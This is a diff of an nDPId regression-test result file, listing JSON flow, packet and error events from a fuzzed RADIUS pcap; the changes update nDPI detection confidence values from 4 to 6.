+00700{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1528996603395,"flow_last_seen":1528996832079,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":834,"flow_tot_l4_payload_len":2114,"flow_avg_l4_payload_len":422,"midstream":0,"thread_ts_msec":1528996832079,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990566,"flow_last_seen":1528996990566,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996990566,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1528996990566,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528996990566,"pkt":"AAAMB6xAABRP+4rqCABFAALbIN1AAP8Rqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528996990648,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1528996990648,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1528996990648,"pkt":"ABRP+4rqcNuYVcUnCABFAACFzqFAAPwRhYTG4hk1CgxAHgcVclAAcSboBSEAaT3FxpV5xYvpMtB7xhdyjsUBNTAzMTE0ODAwNzM2MzgwNzJAd2xhOS5tbmNwODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgJWIyMmEzMWMvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjEx"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528996990648,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528996990648,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":50,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":9472,"global_ts_msec":1528996997052} 00709{"packet_event_id":1,"packet_event_name":"packet","packet_id":50,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":9472,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528996996859,"pkt":"ABRP+4rqcNuYVcUnJQBFAAE4+6JAAPwRV9jG4hk1Cgyqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996684582,"flow_last_seen":1528996684582,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"10.4.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996684582,"flow_last_seen":1528996684582,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"10.4.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996733156,"flow_last_seen":1528996733156,"flow_idle_time":200000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":309,"dst_port":12339,"l4_proto":"udp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} 00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996733156,"flow_last_seen":1528996733156,"flow_idle_time":200000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":309,"dst_port":12339,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00620{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996680808,"flow_last_seen":1528996680808,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"198.226.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00605{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996680808,"flow_last_seen":1528996680808,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"198.226.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00702{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1528996068129,"flow_last_seen":1528996996859,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":10905,"flow_avg_l4_payload_len":436,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00702{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1528996068129,"flow_last_seen":1528996996859,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":10905,"flow_avg_l4_payload_len":436,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":52,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2050,"global_ts_msec":1528997003303} 00608{"packet_event_id":1,"packet_event_name":"packet","packet_id":52,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":239,"pkt_type":2050,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":239,"pkt_l4_len":0,"thread_ts_msec":1528997003122,"pkt":"ABRP+4rqcNuYVcUnCAJFAADh+7RAAPwRWBXG4hk1CgxAHgcUchAAzbxOCyQAxZ9vEHep5UhYAk0ZSBfGW2ABNTAzMTE0ODAwcjM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE0ODQvZjA6Nzk6NjA6ZDE6N2Q6MjcvMjE1WEoBAgBIFwEAAAEFAAD\/dHhHt8FXBaLd\/Dz8eGsAAgUAALtgmvoL3QAA9ON0yrW1Z\/uLAQACCwUAACkdfnJp8UtH8QraekvpDSFQErTrf98odpcx7aFbGWQ5MZk="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":58,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528997012338} 
00711{"packet_event_id":1,"packet_event_name":"packet","packet_id":58,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997012137,"pkt":"ABRP+4rqcNuYVcUnCABFAIEw++ZAAPwRV5TG4hk1CgxAHgcUchABHA0JAicBFBsdKAWbpXDSR2MuOEvDRI4aCwAAV8gbBVNQQxpuAAABNxA0owm4HCG6PU2XNAkv\/vzDOB0KCSSyhii6vunR59O76CIKGOYjAfl7PUhdXq\/+IyUA1AERNOgzhBq9cBFTORk8iq5zOGawlRK5SmrzC9CE14BmLSTx9+rzUr5gcK7nljeTYDH3Q7JtAU4wMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNCUALm12YzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNDg0L2YwOjc5OjYwOmQxOjdkOjM3LzIxNVkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBJln13lrCrLxGDT3fIxBMmg"} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1528996603395,"flow_last_seen":1528996832079,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":834,"flow_tot_l4_payload_len":2114,"flow_avg_l4_payload_len":422,"midstream":0,"thread_ts_msec":1528997012137,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1528996603395,"flow_last_seen":1528996832079,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":834,"flow_tot_l4_payload_len":2114,"flow_avg_l4_payload_len":422,"midstream":0,"thread_ts_msec":1528997012137,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":63,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997023243} 01281{"packet_event_id":1,"packet_event_name":"packet","packet_id":63,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997020091,"pkt":"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"} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997023501,"flow_last_seen":1528997023501,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997023501,"l3_proto":"ip4","src_ip":"198.162.25.53","dst_ip":"10.12.64.30","src_port":1810,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -85,13 +85,13 @@ 01283{"packet_event_id":1,"packet_event_name":"packet","packet_id":71,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":19456,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997030088,"pkt":"AAAMB6xAABRP+4rqTABFAALbIOpAAP8RAAC2DEAexuIZNXIQBxQCxwAAAS4Cv3+VaWYldnjLTxY8VfGmtUsaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMzNwZbIqStATUwMzExNDh\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"} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997046661,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1528997046661,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528997046661,"pkt":"ABRP+4rqcNuYVcUnCABFAACl\/GdAAPwRV57G4hk1SgxAHgcUchAAkRD9CzAAiXzLxBwubl1wwfS6AWnHLCcBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE0OWYvZTA6NWY6NCU6OTA6MDk6NWYvMjE2Tw4BAAAMFwwAAAwBf\/xQEsknsuWEL1cn0K6nAa77dv0="} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997046661,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997046661,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046798,"flow_last_seen":1528997046798,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528997046798,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.77.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01327{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1528997046798,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528997046798,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIO1AAP8RAAAKDEAexuJNNXIQBxQClwAAATECjwe2IRDkqP0tMlR6xA\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"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046798,"flow_last_seen":1528997046798,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528997046798,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.77.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046798,"flow_last_seen":1528997046798,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528997046798,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.77.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997050187,"flow_last_seen":1528997050187,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997050187,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1528997050187,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997050187,"pkt":"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"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997050187,"flow_last_seen":1528997050187,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997050187,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997050187,"flow_last_seen":1528997050187,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997050187,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 